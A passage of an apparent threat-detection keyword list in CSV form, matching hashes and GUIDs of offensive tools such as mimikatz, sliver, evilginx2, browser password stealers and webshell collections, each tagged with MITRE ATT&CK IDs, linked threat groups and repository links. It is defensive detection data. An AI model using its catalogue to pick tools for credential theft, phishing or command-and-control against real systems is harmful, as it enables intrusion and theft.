tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27711" "*608faa1b8a5144d7d610d78a4b4f8eb834c4c786cabc52fe8cabaf95df3ed02e*",".{0,1000}608faa1b8a5144d7d610d78a4b4f8eb834c4c786cabc52fe8cabaf95df3ed02e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27712" "*6093461c4db41a15fefc85a28e35a9e359d0e9452bbfd36ce1fbe7aa31e1f4f0*",".{0,1000}6093461c4db41a15fefc85a28e35a9e359d0e9452bbfd36ce1fbe7aa31e1f4f0.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","#filehash","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","27713" "*60941d4aa4cd1943898c5ca2fa38dde695a90fae106d10e3d53d4f40bbe3e559*",".{0,1000}60941d4aa4cd1943898c5ca2fa38dde695a90fae106d10e3d53d4f40bbe3e559.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27714" "*6098d11342a5c4da204bed3fb3f420ce4df1664eb68ff23a17e4898cb3a11e07*",".{0,1000}6098d11342a5c4da204bed3fb3f420ce4df1664eb68ff23a17e4898cb3a11e07.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","27715" "*60997a4c7f91341633eeaedb0f9316d0ac734a03255b11da128bbc7ac7c3a102*",".{0,1000}60997a4c7f91341633eeaedb0f9316d0ac734a03255b11da128bbc7ac7c3a102.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27716" "*60a78c06f7db71904cc08748c5b507bd88ed8a08c31f21d8a796c562a3f0c5b9*",".{0,1000}60a78c06f7db71904cc08748c5b507bd88ed8a08c31f21d8a796c562a3f0c5b9.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","27717" "*60BBE2CB-585B-4DBD-9CB9-22F00D3F11E5*",".{0,1000}60BBE2CB\-585B\-4DBD\-9CB9\-22F00D3F11E5.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","27719" "*60C1DA68-85AC-43AB-9A2B-27FA345EC113*",".{0,1000}60C1DA68\-85AC\-43AB\-9A2B\-27FA345EC113.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","#GUIDproject","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","27720" "*60c1ea95d10c8223eae771a2261117a4cbd7265b76e5dcf5bc0583f2a095de11*",".{0,1000}60c1ea95d10c8223eae771a2261117a4cbd7265b76e5dcf5bc0583f2a095de11.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 
- TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27721" "*60c72ba7ed39768fd066dda3fdc75bcb5fae6efb3a0b222a3f455526dcf08c96*",".{0,1000}60c72ba7ed39768fd066dda3fdc75bcb5fae6efb3a0b222a3f455526dcf08c96.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","27722" "*60D02E32-1711-4D9E-9AC2-10627C52EB40*",".{0,1000}60D02E32\-1711\-4D9E\-9AC2\-10627C52EB40.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27724" "*60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646*",".{0,1000}60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27726" "*60dd76856a5ee5988ae18a793f4916a17a7808d676a360921c3945d5eb939564*",".{0,1000}60dd76856a5ee5988ae18a793f4916a17a7808d676a360921c3945d5eb939564.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27727" "*60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b*",".{0,1000}60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","27728" "*60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2*",".{0,1000}60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2.{0,1000}","offensive_tool_keyword","winexe","Winexe 
remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","27734" "*60f938d08d551800330090458997ee2944fd79478081275bbe609a25a786f67d*",".{0,1000}60f938d08d551800330090458997ee2944fd79478081275bbe609a25a786f67d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27736" "*60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e*",".{0,1000}60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27737" "*60faba8d3526efd03354e82efb9d9d272bbf39e7b3b5c785b35675d0791b377e*",".{0,1000}60faba8d3526efd03354e82efb9d9d272bbf39e7b3b5c785b35675d0791b377e.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27738" 
"*610f948ee1af2ac334186ca21a3bea4d819a45fee51c2753fe1cd0bb8cc30d1d*",".{0,1000}610f948ee1af2ac334186ca21a3bea4d819a45fee51c2753fe1cd0bb8cc30d1d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27739" "*61106960/adPEAS*",".{0,1000}61106960\/adPEAS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","27740" "*6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da*",".{0,1000}6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27741" "*611ae2bc8e19ad9ab424348376850b3f257767965939579767e9ba15e9135ead*",".{0,1000}611ae2bc8e19ad9ab424348376850b3f257767965939579767e9ba15e9135ead.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27742" "*61241af5ce576034133175ae34bbf8107c57d0b7546b964ba6a436c9f5202638*",".{0,1000}61241af5ce576034133175ae34bbf8107c57d0b7546b964ba6a436c9f5202638.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27744" "*61254294a879235560c1bcf796ff256bc48d2d90*",".{0,1000}61254294a879235560c1bcf796ff256bc48d2d90.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27745" "*6126c4f3c62340df9f501ef98b7266ef2b0fd668a9b286d4bc36eff5e46095bc*",".{0,1000}6126c4f3c62340df9f501ef98b7266ef2b0fd668a9b286d4bc36eff5e46095bc.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","27747" "*612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc*",".{0,1000}612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","27748" "*612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7*",".{0,1000}612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27750" 
"*613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3*",".{0,1000}613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27757" "*613fb7b9493ff4c81e4d1cd45e819aed16a090b28b76b9e3081af8df09b5941e*",".{0,1000}613fb7b9493ff4c81e4d1cd45e819aed16a090b28b76b9e3081af8df09b5941e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27758" "*6142cafb3387eb72f07e6f420aa519affd5fcba4a48459d5084678bc9e661e44*",".{0,1000}6142cafb3387eb72f07e6f420aa519affd5fcba4a48459d5084678bc9e661e44.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27759" 
"*614998828e6d1205980fde58932c9485346edf8e3565669b9a30977d4b952b08*",".{0,1000}614998828e6d1205980fde58932c9485346edf8e3565669b9a30977d4b952b08.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27761" "*614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619*",".{0,1000}614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27763" "*614cf381758fcd853c8aa47a2e3910979fde5751d7d0239149f0bcb75c45c4d6*",".{0,1000}614cf381758fcd853c8aa47a2e3910979fde5751d7d0239149f0bcb75c45c4d6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27764" "*61573b0cc19ea7bfb6ebe0ad6285d490710a1a09db5e32ab7e029ee466874bcc*",".{0,1000}61573b0cc19ea7bfb6ebe0ad6285d490710a1a09db5e32ab7e029ee466874bcc.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting 
Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27765" "*6157a14aae13101415fbf415379811e8b7bcab80741ed55827bc7ce496f33ac5*",".{0,1000}6157a14aae13101415fbf415379811e8b7bcab80741ed55827bc7ce496f33ac5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27766" "*6158ceeafd6c8eaed858e7f763b31444a2d7841a447178809a64dcb73addcf10*",".{0,1000}6158ceeafd6c8eaed858e7f763b31444a2d7841a447178809a64dcb73addcf10.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27767" "*615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966*",".{0,1000}615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27768" 
"*615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66*",".{0,1000}615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27769" "*6165159a8e0b04f13dc7ca465f9553e9c5e0a8e601d922c14a60bdd8bcb27ebf*",".{0,1000}6165159a8e0b04f13dc7ca465f9553e9c5e0a8e601d922c14a60bdd8bcb27ebf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27770" "*6168269eab4621cee6694242ca0d9e5c006f42467751b1a1b0dc70228894b56d*",".{0,1000}6168269eab4621cee6694242ca0d9e5c006f42467751b1a1b0dc70228894b56d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27771" "*61693b7ce852af0c5704294658176c64c547fc15401f7730261349340c47dba2*",".{0,1000}61693b7ce852af0c5704294658176c64c547fc15401f7730261349340c47dba2.{0,1000}","offensive_tool_keyword","macro_pack","The 
macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27772" "*6169805c0a2a3eb13298f86e180539edf62ed3d6ba0fe4bfdb2735e814be347a*",".{0,1000}6169805c0a2a3eb13298f86e180539edf62ed3d6ba0fe4bfdb2735e814be347a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27773" "*616e73276b689f751dab7542c8b884ec883c54559b4877816bc815b619bc1ce9*",".{0,1000}616e73276b689f751dab7542c8b884ec883c54559b4877816bc815b619bc1ce9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27775" "*616f3a9958a29d934fd3b1362d7f10d14d1c36b1d5c144c625fc4ab525110133*",".{0,1000}616f3a9958a29d934fd3b1362d7f10d14d1c36b1d5c144c625fc4ab525110133.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27776" 
"*6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d*",".{0,1000}6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27777" "*61796395b041af4d4a777fa249e255fed98462c18287b1c712b8c3ed33081d24*",".{0,1000}61796395b041af4d4a777fa249e255fed98462c18287b1c712b8c3ed33081d24.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27778" "*6185f2b2dfd6000213f93bbea91b80af670ced8825626656a61e23a8d5780dcb*",".{0,1000}6185f2b2dfd6000213f93bbea91b80af670ced8825626656a61e23a8d5780dcb.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
